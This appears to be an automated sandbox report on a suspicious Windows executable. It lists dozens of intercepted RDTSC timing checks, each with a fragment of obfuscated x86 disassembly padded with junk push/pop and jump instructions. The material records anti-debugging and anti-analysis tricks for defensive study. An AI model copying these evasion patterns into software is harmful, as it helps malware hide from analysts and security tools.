Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C5065C second address: C50662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C50662 second address: C5069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a push edi 0x0000000b jmp 00007F5FC0E77A0Ah 0x00000010 jmp 00007F5FC0E77A0Ah 0x00000015 pop edi 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5FC0E77A17h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C44833 second address: C44839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C25391 second address: C25396 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C50F21 second address: C50F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C50F25 second address: C50F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C50F29 second address: C50F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C50F2F second address: C50F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C50F39 second address: C50F74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D2h 0x00000007 jmp 00007F5FC0CE52D4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5FC0CE52CEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C510D4 second address: C510DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C510DA second address: C510DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C5138F second address: C513A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5FC0E77A0Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C5169B second address: C516A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C516A1 second address: C516A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C516A5 second address: C516BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5FC0CE52CCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C516BB second address: C516BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C516BF second address: C516C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C5663C second address: C56640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C5C3B2 second address: C5C3B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C5C3B6 second address: C5C3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C5C4EB second address: C5C4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C5C4EF second address: C5C4FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C5C66A second address: C5C69B instructions: 0x00000000 rdtsc 0x00000002 je 00007F5FC0CE52C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F5FC0CE52E1h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F5FC0CE52D9h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C5C69B second address: C5C69F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C5CAF7 second address: C5CAFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C5CE30 second address: C5CE41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F5FC0E77A08h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C5CE41 second address: C5CE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5FC0CE52C6h 0x0000000a je 00007F5FC0CE52C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C5E68F second address: C5E693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C601E3 second address: C6022E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5FC0CE52C8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jns 00007F5FC0CE52D3h 0x00000016 jmp 00007F5FC0CE52CDh 0x0000001b mov eax, dword ptr [eax] 0x0000001d push edi 0x0000001e push ebx 0x0000001f jmp 00007F5FC0CE52D5h 0x00000024 pop ebx 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push ecx 0x0000002b jnp 00007F5FC0CE52CCh 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6022E second address: C60288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007F5FC0E77A08h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 00000017h 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 xor edi, dword ptr [ebp+122D27EEh] 0x00000026 call 00007F5FC0E77A09h 0x0000002b jmp 00007F5FC0E77A0Dh 0x00000030 push eax 0x00000031 jmp 00007F5FC0E77A0Ah 0x00000036 mov eax, dword ptr [esp+04h] 0x0000003a js 00007F5FC0E77A14h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C60288 second address: C602AB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5FC0CE52C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5FC0CE52D5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C602AB second address: C602C8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5FC0E77A08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5FC0E77A0Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C60439 second address: C6043D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C60733 second address: C60761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jbe 00007F5FC0E77A1Fh 0x0000000d jmp 00007F5FC0E77A19h 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F5FC0E77A06h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C60761 second address: C60765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C60F3E second address: C60F63 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp], ebx 0x00000010 or dword ptr [ebp+122D25DAh], edx 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5FC0E77A0Ch 0x0000001e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C60F63 second address: C60F6D instructions: 0x00000000 rdtsc 0x00000002 js 00007F5FC0CE52CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C60F6D second address: C60F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6145A second address: C614E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5FC0CE52C6h 0x0000000a popad 0x0000000b jmp 00007F5FC0CE52D2h 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F5FC0CE52D0h 0x00000017 nop 0x00000018 jmp 00007F5FC0CE52CFh 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f jno 00007F5FC0CE52DCh 0x00000025 jmp 00007F5FC0CE52D8h 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F5FC0CE52D1h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C61984 second address: C61A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007F5FC0E77A11h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F5FC0E77A08h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 jmp 00007F5FC0E77A15h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F5FC0E77A08h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D56EEh], ebx 0x00000050 push eax 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C61A09 second address: C61A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C61A0D second address: C61A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6494E second address: C64954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C64954 second address: C6495C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6473D second address: C64741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C660AA second address: C66104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jc 00007F5FC0E77A06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F5FC0E77A08h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov dword ptr [ebp+1244DE3Dh], ebx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 mov si, B3F2h 0x00000039 xchg eax, ebx 0x0000003a push ebx 0x0000003b jmp 00007F5FC0E77A10h 0x00000040 pop ebx 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push ecx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C66104 second address: C66109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C652E1 second address: C652E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C65E5A second address: C65E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C66BFF second address: C66C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C66C04 second address: C66C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6894D second address: C68975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jns 00007F5FC0E77A1Ah 0x0000000b pushad 0x0000000c jbe 00007F5FC0E77A06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C68975 second address: C68986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F5FC0CE52C6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C197BE second address: C197C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C197C2 second address: C197C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6AE94 second address: C6AE98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6AE98 second address: C6AE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6B43E second address: C6B458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6D423 second address: C6D428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6C649 second address: C6C64F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6C64F second address: C6C653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6E329 second address: C6E32D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6E32D second address: C6E33A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6E33A second address: C6E33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6E33F second address: C6E35A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52D7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6E35A second address: C6E3B4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5FC0E77A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push ecx 0x0000000e mov edi, esi 0x00000010 pop ebx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F5FC0E77A08h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F5FC0E77A08h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000015h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 stc 0x0000004a push eax 0x0000004b push ecx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6F312 second address: C6F316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C714C0 second address: C714C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C714C4 second address: C714C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C714C9 second address: C714F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a js 00007F5FC0E77A0Ch 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+12452226h], edx 0x00000018 push 00000000h 0x0000001a mov edi, dword ptr [ebp+124524C3h] 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C714F6 second address: C714FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C714FA second address: C71512 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C725F2 second address: C72611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5FC0CE52D7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C756BE second address: C756D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0E77A13h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7391B second address: C73924 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7486A second address: C74870 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C74870 second address: C74888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F5FC0CE52C6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F5FC0CE52C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C74888 second address: C7488C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7488C second address: C74895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C76A05 second address: C76A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C79894 second address: C7989F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7ABCE second address: C7ABD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7DBA9 second address: C7DBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0CE52CCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7DBBB second address: C7DBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007F5FC0E77A18h 0x0000000d jnc 00007F5FC0E77A08h 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7FD6D second address: C7FD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F5FC0CE52C6h 0x0000000c popad 0x0000000d popad 0x0000000e js 00007F5FC0CE52DAh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7FD85 second address: C7FD89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C7FD89 second address: C7FD8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
